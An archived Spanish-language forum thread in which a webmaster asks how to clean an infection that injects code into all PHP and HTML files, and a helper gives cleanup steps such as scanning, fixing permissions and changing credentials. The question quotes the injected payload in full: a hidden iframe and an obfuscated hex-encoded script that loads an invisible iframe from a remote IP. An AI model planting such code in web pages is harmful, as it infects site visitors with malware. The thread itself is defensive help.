Ver la Versión Completa : como solucionar malware que daña archios php y html


niko19
26/02/08, 00:18:29
saludos... como podria eliminar un agente malicisio que se llama HTML_IFRAME.CX el cual injecta un codigo malicioso a todos los archivos php y html porfavor ayuda estoy desesperado mis usuarios se quejan de que mi web tiene virus... y grax de antemano

Este es el codigo que injecta
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47babeb4be424(v47babeb4be820){ var v47babeb4bf019=16; return(parseInt(v47babeb4be820,v47babeb4bf019));}f unction v47babeb4c000b(v47babeb4c0802){ function v47babeb4c17f3 () {return 2;} var v47babeb4c0ffb='';for(v47babeb4c13f7=0; v47babeb4c13f7<v47babeb4c0802.length; v47babeb4c13f7+=v47babeb4c17f3()){ v47babeb4c0ffb+=(String.fromCharCode(v47babeb4be42 4(v47babeb4c0802.substr(v47babeb4c13f7, v47babeb4c17f3()))));}return v47babeb4c0ffb;} document.write(v47babeb4c000b('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D653 06636336633207372633D5C27687474703A2F2F37372E32323 12E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6 174682E726F756E64284D6174682E72616E646F6D28292A323 2313430292B27643664306234365C272077696474683D32303 5206865696768743D313038207374796C653D5C27646973706 C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5 343524950543E'));</script> "

ElPiedra
26/02/08, 17:09:20
Hola niko19, te doy la bienvenida al Foro de InfoSpyware.

Este malware afecta únicamente versiones viejas de CPanel y en servidores que tengan activado el mod_security, por lo que si no sos el administrador total de este te sugiero ponerte en contacto con tu provedor de hosting.

Mientras tanto podes ir realizando los siguiente:


Realizarle un escaneo al servidor con un buen antivirus como Kaspersky.
Cambia los atributos de los archivos de los archivos Index, Home y Default de 777 a 644 mediante chmod.
Cambia los nombres de usuarios y passwords de Cpanel y FTP.
Chequear todas las carpetas en busca de archivos index, home y default que estén infectados ejemplo:

www/index.html
www/folder1/index.html
www/fodler2/index.html
www/.../index.html



Salu2

© Copyright 2005 - 2008 InfoSpyware ® Todos los derechos reservados.
InfoSpyware Security Blog